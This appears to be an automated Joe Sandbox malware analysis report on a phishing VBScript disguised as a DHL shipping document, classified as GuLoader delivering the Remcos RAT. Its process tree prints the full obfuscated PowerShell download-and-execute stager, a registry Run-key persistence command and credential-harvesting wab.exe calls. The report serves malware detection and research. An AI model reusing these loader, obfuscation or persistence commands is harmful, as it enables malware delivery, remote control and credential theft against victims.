Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL Shipping Document Awb & BL.vbs

Overview

General Information

Sample name:DHL Shipping Document Awb & BL.vbs
Analysis ID:1465419
MD5:af8e905368962cfb4873c41a77b4515c
SHA1:577337de5d106e6b11225be7c362f33a8d5c0831
SHA256:bde3493e67a6088d2d265ca765e9aba6f98cc45eb933d5f00f498ffac84711a3
Tags:vbs
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7448 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping Document Awb & BL.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighederne ' $Eg l oAbTaUli: BCa.nodTh.oUoFk =H$ tDr u eP ') ;Opdateringsprogrammet $Nourishments;Opdateringsprogrammet (Brandmyndighederne ' SBtFa,r tS-TS l.eSeUp 4L ');Opdateringsprogrammet (Brandmyndighederne ' $.gPl o,bMa,l,: A.s,p eTrAsii.oPn s,2,3 =H(ST eBsFtS-PPAa t hi H$RH,j lBp eVp rSsPtse rBs ), ') ;Opdateringsprogrammet (Brandmyndighederne 'E$OgCl o.b aLl.:AFPu,gFtUi gUh e,dMsHcFr eYmFeSrPnReP= $UgKl.oFbIaSlC:.MIiUd eArRnFe.sF+ + %,$.t iFl kVa,l dStIeP. cTo uSnAtO ') ;$Lancinated=$tilkaldte[$Fugtighedscremerne];}$Spidskandidaternes=331099;$Amphitoky=27737;Opdateringsprogrammet (Brandmyndighederne 'D$,g lPoFbSa l :DFMa,t,t i,gUfBiBn t O=. KGFe,tI-FCBo n.tAe.n t. ,$MHMjSl,pVeSpAr.s t.e.r.sD ');Opdateringsprogrammet (Brandmyndighederne 'A$ gSlRo b.aSl.:.O rUaBt o r iKcAaUlSlEyg T=G L[JSVy s tSeRmE.iC.o.nCv eHrAtF] :.:FF r o mIB a.s eP6O4 SFt r i,n g.( $ FIaht.t,iTgAf i.nTts)H ');Opdateringsprogrammet (Brandmyndighederne 'R$GgBl oTbta lJ:.RSu d yKaSrbdB =O F[PSCy.sFtVeEm,. T e.x.t . E n c,oAd,i nTg ].:,:LA,SBCUI,Im.EG ert S tYrSi,n,gu( $ O rAa tTo,r iLc a.lslMyD)e ');Opdateringsprogrammet (Brandmyndighederne 'F$Tg.l,oLbEa lZ:FB e sTt iBlSl e rF=.$,RTuRdHy a r,dF.Fs.u,bUs,tUrCi nNg,(D$.S p,i,d s,kFaMnPdei,dDa t e r nEe.sN,F$KAEm p h.iBt o.k,yE)T ');Opdateringsprogrammet $Bestiller;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7712 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7792 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighederne ' $Eg l oAbTaUli: BCa.nodTh.oUoFk =H$ tDr u eP ') ;Opdateringsprogrammet $Nourishments;Opdateringsprogrammet (Brandmyndighederne ' SBtFa,r tS-TS l.eSeUp 4L ');Opdateringsprogrammet (Brandmyndighederne ' $.gPl o,bMa,l,: A.s,p eTrAsii.oPn s,2,3 =H(ST eBsFtS-PPAa t hi H$RH,j lBp eVp rSsPtse rBs ), ') ;Opdateringsprogrammet (Brandmyndighederne 'E$OgCl o.b aLl.:AFPu,gFtUi gUh e,dMsHcFr eYmFeSrPnReP= $UgKl.oFbIaSlC:.MIiUd eArRnFe.sF+ + %,$.t iFl kVa,l dStIeP. cTo uSnAtO ') ;$Lancinated=$tilkaldte[$Fugtighedscremerne];}$Spidskandidaternes=331099;$Amphitoky=27737;Opdateringsprogrammet (Brandmyndighederne 'D$,g lPoFbSa l :DFMa,t,t i,gUfBiBn t O=. KGFe,tI-FCBo n.tAe.n t. ,$MHMjSl,pVeSpAr.s t.e.r.sD ');Opdateringsprogrammet (Brandmyndighederne 'A$ gSlRo b.aSl.:.O rUaBt o r iKcAaUlSlEyg T=G L[JSVy s tSeRmE.iC.o.nCv eHrAtF] :.:FF r o mIB a.s eP6O4 SFt r i,n g.( $ FIaht.t,iTgAf i.nTts)H ');Opdateringsprogrammet (Brandmyndighederne 'R$GgBl oTbta lJ:.RSu d yKaSrbdB =O F[PSCy.sFtVeEm,. T e.x.t . E n c,oAd,i nTg ].:,:LA,SBCUI,Im.EG ert S tYrSi,n,gu( $ O rAa tTo,r iLc a.lslMyD)e ');Opdateringsprogrammet (Brandmyndighederne 'F$Tg.l,oLbEa lZ:FB e sTt iBlSl e rF=.$,RTuRdHy a r,dF.Fs.u,bUs,tUrCi nNg,(D$.S p,i,d s,kFaMnPdei,dDa t e r nEe.sN,F$KAEm p h.iBt o.k,yE)T ');Opdateringsprogrammet $Bestiller;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7884 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 1712 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • cmd.exe (PID: 6924 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 7284 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • wab.exe (PID: 1556 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 3492 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 1792 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 604 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 2072 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 1832 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tyyoarljemyfhm" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wscript.exe (PID: 3252 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\kpburtts.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000002.1856054813.00000000090AD000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      0000000A.00000002.2247528936.0000000003BCD000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: powershell.exe PID: 7548JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Process Memory Space: powershell.exe PID: 7548INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0x16584a:$b2: ::FromBase64String(
          • 0x2c3604:$b2: ::FromBase64String(
          • 0x2c3640:$b2: ::FromBase64String(
          • 0x2c367d:$b2: ::FromBase64String(
          • 0x2c36bb:$b2: ::FromBase64String(
          • 0x2c36fa:$b2: ::FromBase64String(
          • 0x2c373a:$b2: ::FromBase64String(
          • 0x2c377b:$b2: ::FromBase64String(
          • 0x2c37bd:$b2: ::FromBase64String(
          • 0x2c3800:$b2: ::FromBase64String(
          • 0x2c3844:$b2: ::FromBase64String(
          • 0x2c3889:$b2: ::FromBase64String(
          • 0x2c38cf:$b2: ::FromBase64String(
          • 0x2c3916:$b2: ::FromBase64String(
          • 0x71e1f:$s1: -join
          • 0x76f86:$s1: -join
          • 0x98e04:$s1: -join
          • 0xa5ed9:$s1: -join
          • 0xa92ab:$s1: -join
          • 0xa995d:$s1: -join
          • 0xab44e:$s1: -join
          Process Memory Space: powershell.exe PID: 7792JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Click to see the 4 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_7548.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_7792.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xd9f7:$b2: ::FromBase64String(
              • 0xca6a:$s1: -join
              • 0x6216:$s4: +=
              • 0x62d8:$s4: +=
              • 0xa4ff:$s4: +=
              • 0xc61c:$s4: +=
              • 0xc906:$s4: +=
              • 0xca4c:$s4: +=
              • 0x16007:$s4: +=
              • 0x16087:$s4: +=
              • 0x1614d:$s4: +=
              • 0x161cd:$s4: +=
              • 0x163a3:$s4: +=
              • 0x16427:$s4: +=
              • 0xd299:$e4: Get-WmiObject
              • 0xd488:$e4: Get-Process
              • 0xd4e0:$e4: Start-Process
              • 0x16ca6:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Script Interpreter Execution From Suspicious Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 1712, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs" , ProcessId: 3252, ProcessName: wscript.exe
              Sigma detected: Suspicious Script Execution From Temp Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 1712, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs" , ProcessId: 3252, ProcessName: wscript.exe
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping Document Awb & BL.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping Document Awb & BL.vbs", CommandLine|base64offset|contains: J), Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping Document Awb & BL.vbs", ProcessId: 7448, ProcessName: wscript.exe
              Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 1712, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)", ProcessId: 6924, ProcessName: cmd.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7284, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\gstes
              Sigma detected: Direct Autorun Keys Modification
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6924, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)", ProcessId: 7284, ProcessName: reg.exe
              Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
